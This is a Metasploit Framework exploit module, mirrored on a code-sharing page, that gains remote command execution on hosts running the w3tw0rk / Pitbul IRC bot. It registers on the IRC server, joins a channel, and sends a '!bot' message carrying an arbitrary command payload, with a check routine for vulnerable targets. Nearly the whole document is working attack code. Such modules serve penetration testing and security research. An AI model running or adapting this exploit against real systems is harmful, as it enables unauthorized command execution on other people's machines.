Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/multi/misc/w3tw0rk_exec.rb
19566 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = ExcellentRanking

8


9
  include Msf::Exploit::Remote::Tcp

10


11
  def initialize(info = {})

12
    super(

13
      update_info(

14
        info,

15
        'Name' => 'w3tw0rk / Pitbul IRC Bot  Remote Code Execution',

16
        'Description' => %q{

17
          This module allows remote command execution on the w3tw0rk / Pitbul IRC Bot.

18
        },

19
        'Author' => [

20
          'Jay Turla'

21
        ],

22
        'License' => MSF_LICENSE,

23
        'References' => [

24
          [ 'OSVDB', '120384' ],

25
          [ 'EDB', '36652' ]

26
        ],

27
        'Platform' => %w{unix win},

28
        'Arch' => ARCH_CMD,

29
        'Payload' => {

30
          'Space' => 300, # According to RFC 2812, the max length message is 512, including the cr-lf

31
          'DisableNops' => true,

32
          'Compat' =>

33
                        {

34
                          'PayloadType' => 'cmd'

35
                        }

36
        },

37
        'Targets' => [

38
          [ 'w3tw0rk', {} ]

39
        ],

40
        'Privileged' => false,

41
        'DisclosureDate' => '2015-06-04',

42
        'DefaultTarget' => 0,

43
        'Notes' => {

44
          'Reliability' => UNKNOWN_RELIABILITY,

45
          'Stability' => UNKNOWN_STABILITY,

46
          'SideEffects' => UNKNOWN_SIDE_EFFECTS

47
        }

48
      )

49
    )

50


51
    register_options(

52
      [

53
        Opt::RPORT(6667),

54
        OptString.new('IRC_PASSWORD', [false, 'IRC Connection Password', '']),

55
        OptString.new('NICK', [true, 'IRC Nickname', 'msf_user']),

56
        OptString.new('CHANNEL', [true, 'IRC Channel', '#channel'])

57
      ]

58
    )

59
  end

60


61
  def post_auth?

62
    true

63
  end

64


65
  def check

66
    connect

67


68
    res = register(sock)

69
    if res =~ /463/ || res =~ /464/

70
      vprint_error("#{rhost}:#{rport} - Connection to the IRC Server not allowed")

71
      return Exploit::CheckCode::Unknown

72
    end

73


74
    res = join(sock)

75
    if !res =~ /353/ && !res =~ /366/

76
      vprint_error("#{rhost}:#{rport} - Error joining the #{datastore['CHANNEL']} channel")

77
      return Exploit::CheckCode::Unknown

78
    end

79


80
    quit(sock)

81
    disconnect

82


83
    if res =~ /auth/ && res =~ /logged in/

84
      Exploit::CheckCode::Vulnerable

85
    else

86
      Exploit::CheckCode::Safe

87
    end

88
  end

89


90
  def send_msg(sock, data)

91
    sock.put(data)

92
    data = ""

93
    begin

94
      read_data = sock.get_once(-1, 1)

95
      while !read_data.nil?

96
        data << read_data

97
        read_data = sock.get_once(-1, 1)

98
      end

99
    rescue ::EOFError, ::Timeout::Error, ::Errno::ETIMEDOUT => e

100
      elog(e)

101
    end

102


103
    data

104
  end

105


106
  def register(sock)

107
    msg = ""

108


109
    if datastore['IRC_PASSWORD'] && !datastore['IRC_PASSWORD'].empty?

110
      msg << "PASS #{datastore['IRC_PASSWORD']}\r\n"

111
    end

112


113
    if datastore['NICK'].length > 9

114
      nick = rand_text_alpha(9)

115
      print_error("The nick is longer than 9 characters, using #{nick}")

116
    else

117
      nick = datastore['NICK']

118
    end

119


120
    msg << "NICK #{nick}\r\n"

121
    msg << "USER #{nick} #{Rex::Socket.source_address(rhost)} #{rhost} :#{nick}\r\n"

122


123
    send_msg(sock, msg)

124
  end

125


126
  def join(sock)

127
    join_msg = "JOIN #{datastore['CHANNEL']}\r\n"

128
    send_msg(sock, join_msg)

129
  end

130


131
  def w3tw0rk_command(sock)

132
    encoded = payload.encoded

133
    command_msg = "PRIVMSG #{datastore['CHANNEL']} :!bot #{encoded}\r\n"

134
    send_msg(sock, command_msg)

135
  end

136


137
  def quit(sock)

138
    quit_msg = "QUIT :bye bye\r\n"

139
    sock.put(quit_msg)

140
  end

141


142
  def exploit

143
    connect

144


145
    print_status("#{rhost}:#{rport} - Registering with the IRC Server...")

146
    res = register(sock)

147
    if res =~ /463/ || res =~ /464/

148
      print_error("#{rhost}:#{rport} - Connection to the IRC Server not allowed")

149
      return

150
    end

151


152
    print_status("#{rhost}:#{rport} - Joining the #{datastore['CHANNEL']} channel...")

153
    res = join(sock)

154
    if !res =~ /353/ && !res =~ /366/

155
      print_error("#{rhost}:#{rport} - Error joining the #{datastore['CHANNEL']} channel")

156
      return

157
    end

158


159
    print_status("#{rhost}:#{rport} - Exploiting the IRC bot...")

160
    w3tw0rk_command(sock)

161


162
    quit(sock)

163
    disconnect

164
  end

165
end

166


167